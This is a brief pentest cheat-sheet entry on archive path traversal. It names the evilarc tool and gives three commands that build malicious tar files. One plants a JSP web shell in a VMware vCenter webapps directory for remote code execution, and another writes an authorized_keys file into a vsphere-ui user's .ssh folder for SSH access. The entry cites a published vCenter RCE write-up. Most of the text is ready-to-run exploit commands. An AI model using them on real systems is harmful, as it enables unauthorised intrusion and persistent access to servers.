# Path Traversal

[**evilarc**](https://github.com/ptoomey3/evilarc)**:** evilarc lets you create a zip file that contains files with directory traversal characters in their embedded path.

```
python evilarc.py -d 2 -p 'testFolder\' -o win -f winexpl.tar testUpload.txt
python evilarc.py -d 5 -p 'ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport' -o win -f winexpl.tar testRCE.jsp
python evilarc.py -d 5 -p 'home/vsphere-ui/.ssh' -o unix -f linexpl.tar authorized_keys
```

Reference: <https://swarm.ptsecurity.com/unauth-rce-vmware/>